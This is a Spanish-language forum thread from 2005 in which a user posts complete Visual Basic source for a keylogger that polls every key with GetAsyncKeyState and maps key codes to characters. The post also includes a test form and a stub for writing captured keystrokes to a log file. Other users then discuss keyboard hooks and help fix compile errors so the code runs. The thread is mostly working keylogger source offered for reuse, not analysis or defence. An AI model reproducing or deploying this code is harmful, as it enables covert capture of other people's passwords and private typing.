keylogger en VB

Iniciado por soplo, 25 Agosto 2005, 00:06 AM

0 Miembros y 1 Visitante están viendo este tema.

soplo

Hola
Este es un keylooger que hice hace un año o así. Funciona bien aunque es manifiestamente mejorable. Es un buen ejemplo.

Hay dos partes. Una es un pequeño programa de prueba (para ver lo que el keylogger va detectando). Para ello le poneis los controles y el código indicado y luego os vais por ejemplo al notepad y os poneis a escribir. En el programa de prueba deberían ir quedando todas las pulsaciones que vais haciendo.

La rutina fundamental es la función ObtenerTecla y unas pequeñas funciones para saber si es mayúscula o no , etc.

Existe otra técnica posible para hacer un keylogger. La que se llama un hook de teclado (o un gancho de teclado). Tiene algunas ventajas y algún inconveniente.
-----------------------------------------------------------------------------------
Programa que prueba la rutina
En una aplicación visual basic añadir al formulario form1 el cuadro de texto text1 con las siguientes propiedades:
text1.multiline = true
text1.heigh= 1335
text1.width = 12975


Poner un objeto timer con las siguiente propiedad
timer1.interval=100
(probar con distintos resultados para sacar consecuencias)

Poner un command con la siguiente propiedad
command1.caption="Limpiar"

----------------------------------------------------------------------------------
Rutinas del programa de prueba

Private Sub Command1_Click()
Text1 = "" ' vaciar textbox
End Sub


Private Sub Text1_Change()
If Len(Text1) > 500 Then
' Escribir txt.log
End If
End Sub

-----------------------------------------------------------------------------------
comienzo de keylogger
------------------------------------------------------------------------------------
Función ShiftPulsado. Comprueba si se ha pulsado cualquiera de las dos teclas shift del teclado (es posible diferenciar cada una si se quiere)

Private Function ShiftPulsado() ' true si está pulsado shift
ShiftPulsado = IIf(GetKeyState(16) < 0, True, False) 'VK_SHIFT
End Function

------------------------------------------------------------------------------------
Función BloqMayus. Comprueba si se ha activado bloq mayus

Private Function BloqMayus() 'True si está pulsado bloqmayus
BloqMayus = IIf(GetKeyState(20) < 0, True, False) 'VK_CAPSLOCK
End Function

------------------------------------------------------------------------------------
Función NumLock. Comprueba si está pulsada la tecla Numlock

Private Function NumLock() 'True si está pulsado NUMLOCK
NumLock = IIf(GetKeyState(144) < 0, True, False) 'VK_NUMLOCK
End Function

-----------------------------------------------------------------------------------
Función AltGr comprueba si está pulsada la tecla ALT GR.

Private Function AltGr() 'true si está pulsado ALT GR
AltGr = IIf(GetKeyState(165) < 0, True, False) 'VK_RMENU
End Function

-----------------------------------------------------------------------------------
Función del timer que comprueba cada cierto intervalo de tiempo si se ha pulsado una tecla. Para ello revisa cada una de las posibilidades y si encuentra una tecla pulsada la guarda en la variable Tecla y la añade al text1.

Private Sub Timer1_Timer() 'probar con distintos intervalos de timer
Dim Tecla As String
For x% = 0 To 255 'para los 255 códigos ascii
If GetAsyncKeyState(x%) Then 'si se ha pulsado una tecla
Tecla = ObtenerTecla(x%) 'obtener tecla pulsada
Text1 = Text1 & Tecla 'añadir tecla a teclas pulsadas
Text1.Refresh
End If
Next
End Sub

------------------------------------------------------------------------------------
Función ObtenerTecla. Se le pasa como parámetro el código virtual de la tecla pulsada y devuelve el resultado. Es la rutina propiamente de un keylogger.

Fijaos que en vez de el nombre de la tecla he pueso su código virtual. La razón es que teóricamente es igual, pero con los nombres no me funcionaba y cuando puse su código funcionó.

Function ObtenerTecla(x As Integer)
Dim Tecla As String
Select Case x
Case 1 'VK_LBUTTON 'botón izquierdo del ratón
Case 2 'VK_RBUTTON 'botón derecho del ratón
Case 4 'VK_MBUTTON 'botón medio del ratón
Case 3 'VK_CANCEL 'break interrumpir
Case 8 'VK_BACK
Tecla = "[DEL]"
Case 9 'VK_TAB
Tecla = "[TAB]"
Case 13 'VK_RETURN
Tecla = "[ENTER]"
'opcionalmente se puede poner que se inserte línea en vez de insertar el literal [ENTER]
'sería así: Tecla = Chr(13) & Chr(10)
Case 92 'VK_CLEAR '5 en keypadd sin numlook
Case 19 'VK_PAUSE 'Pausa
Tecla = "[PAUSA]"
Case 32 'VK_SPACE
Tecla = " "
Case 27 'VK_ESC 'escape
Tecla = "[ESC]"
Case 33 'VK_PRIOR
Tecla = "[RE PAG]"
Case 34 'VK_NEXT
Tecla = "[AV PAG]"
Case 35 'VK_END
Tecla = "[FIN]"
Case 36 'VK_HOME
Tecla = "[INICIO]"
Case 37 'VK_LEFT
Tecla = "[IZQ]"
Case 38 'VK_RIGHT
Tecla = "[DER]"
Case 39 'VK_UP
Tecla = "[ARRIBA]"
Case 40 'VK_DOWN
Tecla = "[ABAJO]"
Case 44 'imprpant
Tecla = "[IMPR PANT]"
Case 45, VK_INSERT
Tecla = "[INS]"
Case 46, VK_DELETE
Tecla = "[SUPR]"
Case 48 To 57 'VK_0 - VK_9
If Not ShiftPulsado Then 'si no se ha cambiado tecla de shift
Tecla = Str$(x - 48) 'poner en tecla el nº correspondiente
Else
Tecla = Mid$("!""""·$%&/()=", x - 47, 1) 'extraer el caracter correspondiente
End If
If AltGr Then
If x = 49 Then 'alt gr + 1
Tecla = "|"
ElseIf x = 50 Then 'alt gr + 2
Tecla = "@"
ElseIf x = 51 Then 'alt gr + 3
Tecla = "#"
ElseIf x = 54 Then 'alt gr +6
Tecla = "¬"
End If
End If
Case 65 To 90 'letras VK_A - VK_Z
If BloqMayus Then
Tecla = IIf(ShiftPulsado, LCase$(Chr(x)), UCase(Chr(x)))
Else
Tecla = IIf(ShiftPulsado, UCase$(Chr(x)), LCase$(Chr(x)))
End If
Case 96 To 105 'numpad VK_NUMPAD0 - VK_NUMPAD9'
If Not NumLock Then
Tecla = LTrim$(Str$(x - 96)) 'obtener número correspondiente a teclado numpad
Else
Tecla = ObtenerTecla(x - 48) 'obtener valor correspondiente a numpad sin numlock
End If
Case 106 'VK_MULTIPLY
Tecla = "*"
Case 107 'VK_NUMPADADD
Tecla = "+"
Case 110 'VK_NUMPADDECIMAL
Tecla = "."
Case 111 'VK_NUMPADDIVIDE
Tecla = "/"
Case 109 'VK_SUBSTRACKT
Tecla = "-"
Case 112 To 123 'VK_F1 - VK_F12
Tecla = "[F" & x - 111 & "]"
Case 145 'VK_SCROLL 'Bloq Despl
Tecla = "[BLOQ DESPL]"
Case 186 '^`
Tecla = IIf(ShiftPulsado, "^", "`")
Tecla = IIf(AltGr, "[", Tecla)
Case 187 '+ *
Tecla = IIf(ShiftPulsado, "*", "+")
Tecla = IIf(AltGr, "]", Tecla)
Case 188 '; ,
Tecla = IIf(ShiftPulsado, ";", ",")
Case 189 '- _ )
Tecla = IIf(ShiftPulsado, "_", "-")
Case 190 ': .
Tecla = IIf(ShiftPulsado, ":", ".")
Case 191 'ç Ç
Tecla = IIf(ShiftPulsado, "Ç", "ç")
Tecla = IIf(AltGr, "}", Tecla)
Case 192 '~ '
Tecla = IIf(ShiftPulsado, "~", "'")
Case 219 '? '
Tecla = IIf(ShiftPulsado, "?", "'")
Case 220 '| \
Tecla = IIf(ShiftPulsado, "ª", "º")
Tecla = IIf(AltGr, "\", Tecla)
Case 221 '¿ ¡
Tecla = IIf(ShiftPulsado, "¿", "¡")
Case 222 ' ¨ ´
Tecla = IIf(ShiftPulsado, "¨", "´")
Tecla = IIf(AltGr, "{", Tecla)
Case 226 ' < >
Tecla = IIf(ShiftPulsado, ">", "<")
End Select
ObtenerTecla = Tecla
End Function
Callar es asentir ¡No te dejes llevar!

ZEALOT

bakano pez, muy bueno, el keylog de hook en vb es facil SIN una dll hecha en vb, simplemente el programa se "hookea" ;) a si mismo, con una funcion calback y listo a escuchar los mensajes del teclado, la otra forma en vb es con una dll PERO esta debe ser hecha en c++, porque las dll que genera vb son dll activex o no         se que passa pero no se puede supuestamente, toy intentando hacerla con la dll de vb pero creo que es mas facil con c++...

suertes  ;D

Bourne Ultimatum

me tira un error en esta parte
Private Sub Timer1_Timer() 'probar con distintos intervalos de timer
Dim Tecla As String
For x% = 0 To 255 'para los 255 códigos ascii
If GetAsyncKeyState(x%) Then 'si se ha pulsado una tecla
Tecla = ObtenerTecla(x%) 'obtener tecla pulsada
Text1 = Text1 & Tecla 'añadir tecla a teclas pulsadas
Text1.Refresh
End If
Next
End Sub


"Procedimiento Sub o Function no definido"
ayuda!
"El pertenecia a esa clase singular de hombres que la especie produce rara vez,
en quienes el ansia de poder ilimitado es tan extremo que para conseguirlo
cualquier sufrimiento parece natural" Ernesto CHE Guevara

http://www.desdeabajorugby.com.ar

NYlOn

tenes que agregar las siguientes declaraciones:


Public Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer
Public Declare Function GetKeyState Lib "user32" Alias "GetKeyState" (ByVal nVirtKey As Long) As Integer


x cierto, muy bueno el KL, gracias x el posteo Soplo ;)

salud0s

G0nz4

Bourne Ultimatum

"error de compilacion
los cometarios solamente pueden aparecer depues de end sub, end function o end property"

y esto?
"El pertenecia a esa clase singular de hombres que la especie produce rara vez,
en quienes el ansia de poder ilimitado es tan extremo que para conseguirlo
cualquier sufrimiento parece natural" Ernesto CHE Guevara

http://www.desdeabajorugby.com.ar

NYlOn

emm, los comentarios pueden aparecer en cualkier lad0 q yo sepa =S, nunca me trejeron problemas...
estas seguro que es asi el error ??

Bourne Ultimatum

sip puse lo q vos me dijiste arriba de tdo y aparece eso
"El pertenecia a esa clase singular de hombres que la especie produce rara vez,
en quienes el ansia de poder ilimitado es tan extremo que para conseguirlo
cualquier sufrimiento parece natural" Ernesto CHE Guevara

http://www.desdeabajorugby.com.ar

Bourne Ultimatum

con esto no me tira error

Option Explicit
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer


pero ahora me tira error aca:
For x% = 0 To 255 'para los 255 códigos ascii
dice variable no definida en x%
"El pertenecia a esa clase singular de hombres que la especie produce rara vez,
en quienes el ansia de poder ilimitado es tan extremo que para conseguirlo
cualquier sufrimiento parece natural" Ernesto CHE Guevara

http://www.desdeabajorugby.com.ar

el_chente23

Supongo que no tienes declarada la variable "x".

Saludos

Bourne Ultimatum

no eso lo veo
pero como la declaroo

saludos
"El pertenecia a esa clase singular de hombres que la especie produce rara vez,
en quienes el ansia de poder ilimitado es tan extremo que para conseguirlo
cualquier sufrimiento parece natural" Ernesto CHE Guevara

http://www.desdeabajorugby.com.ar